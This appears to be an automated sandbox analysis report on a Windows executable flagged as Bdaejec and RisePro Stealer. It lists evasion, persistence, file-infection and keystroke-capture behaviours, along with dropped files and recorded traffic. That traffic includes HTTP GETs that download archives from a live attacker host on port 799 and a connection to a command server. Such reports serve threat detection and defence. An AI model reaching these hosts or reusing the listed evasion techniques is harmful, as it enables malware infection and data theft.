Windows Analysis Report
hunta[1].exe

Overview

General Information

Sample name: hunta[1].exe
Analysis ID: 1480972
MD5: 651de10cfaaa78be50eda9f3f0ce9ea7
SHA1: 6b922567fc5880e38fc9a3eacc24f6bab3785731
SHA256: e5cb4f3f8d41c28116b9ff3253ab5f6d6736e18da2d225cf15379954b2751643
Tags: exe

Detection

Bdaejec, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

AV Detection

Source: hunta[1].exe Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k2.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rars Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarA Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/ URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarppData Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar1 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarV Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/O Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar8 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/d Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rar5 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC: Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarc Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC: Avira URL Cloud: Label: phishing
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe ReversingLabs: Detection: 92%
Source: hunta[1].exe ReversingLabs: Detection: 94%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: hunta[1].exe Joe Sandbox ML: detected
Source: hunta[1].exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 4_2_002129E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_00B529E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 4_2_00212B8C
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 799
Source: global traffic TCP traffic: 192.168.2.10:49707 -> 44.221.84.105:799
Source: global traffic TCP traffic: 192.168.2.10:49709 -> 193.233.132.62:50500
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View IP Address: 193.233.132.62 193.233.132.62
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ddos.dnsnb8.net:799 | Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E9DB60 recv,WSAStartup,closesocket,socket,connect,closesocket, 2_2_00E9DB60
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: WwKLWFk.exe, 00000004.00000002.1418744854.0000000000213000.00000002.00000001.01000000.00000004.sdmp, WwKLWFk.exe, 00000004.00000003.1268128954.0000000000DF0000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1466940967.0000000000980000.00000004.00001000.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/O
Source: WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/d
Source: WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarV
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarppData
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar1
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar8
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: WwKLWFk.exe, 00000004.00000002.1418971368.0000000001210000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar2OneDrive=C:
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar5
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rars
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.4.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.4.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.4.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.4.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.4.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.4.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.4.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.4.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.4.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: hunta[1].exe, 00000002.00000003.1287200302.0000000005700000.00000004.00001000.00020000.00000000.sdmp, hunta[1].exe, 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000003.1362777852.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3728679441.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000003.1366449585.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000003.1485625722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000003.1559253184.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: WwKLWFk.exe, 00000004.00000002.1418971368.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.000000000105D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000F.00000002.3734938152.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000E88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT%
Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000015.00000002.3735676016.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORTv
Source: SciTE.exe.4.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.4.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: SciTE.exe.4.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_f59074ed-0

System Summary

Source: hunta[1].exe Static PE information: section name:
Source: hunta[1].exe Static PE information: section name: .idata
Source: hunta[1].exe Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: RageMP131.exe.2.dr Static PE information: section name: .idata
Source: RageMP131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MPGPH131.exe.2.dr Static PE information: section name: .idata
Source: MPGPH131.exe.2.dr Static PE information: section name:
Source: MyProg.exe.4.dr Static PE information: section name: Y|uR
Source: WwKLWFk.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\hunta[1].exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F04870 2_2_00F04870
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E82040 2_2_00E82040
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F0B800 2_2_00F0B800
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E9A100 2_2_00E9A100
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E822C0 2_2_00E822C0
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E942A0 2_2_00E942A0
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F603A0 2_2_00F603A0
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00EF0380 2_2_00EF0380
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E8AB50 2_2_00E8AB50
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F63B28 2_2_00F63B28
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F5A450 2_2_00F5A450
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F01590 2_2_00F01590
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00F6956F 2_2_00F6956F
Source: C:\Users\user\Desktop\hunta[1].exe Code function: 2_2_00E8A720 2_2_00E8A720
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00216076 4_2_00216076
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe Code function: 4_2_00216D00 4_2_00216D00
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0038B800 14_2_0038B800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00384870 14_2_00384870
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00302040 14_2_00302040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0031A100 14_2_0031A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003142A0 14_2_003142A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003022C0 14_2_003022C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003E3B28 14_2_003E3B28
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0030AB50 14_2_0030AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003E03A0 14_2_003E03A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00370380 14_2_00370380
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003DA450 14_2_003DA450
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_003E956F 14_2_003E956F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_00381590 14_2_00381590
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 14_2_0030A720 14_2_0030A720
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0038B800 15_2_0038B800
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00384870 15_2_00384870
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00302040 15_2_00302040
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0031A100 15_2_0031A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003142A0 15_2_003142A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003022C0 15_2_003022C0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003E3B28 15_2_003E3B28
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0030AB50 15_2_0030AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003E03A0 15_2_003E03A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00370380 15_2_00370380
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003DA450 15_2_003DA450
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_003E956F 15_2_003E956F
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_00381590 15_2_00381590
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 15_2_0030A720 15_2_0030A720
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002FB800 21_2_002FB800
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002F4870 21_2_002F4870
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00272040 21_2_00272040
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0028A100 21_2_0028A100
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002842A0 21_2_002842A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002722C0 21_2_002722C0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_00353B28 21_2_00353B28
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0027AB50 21_2_0027AB50
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_003503A0 21_2_003503A0
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002E0380 21_2_002E0380
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0034A450 21_2_0034A450
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_0035956F 21_2_0035956F
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 21_2_002F1590 21_2_002F1590
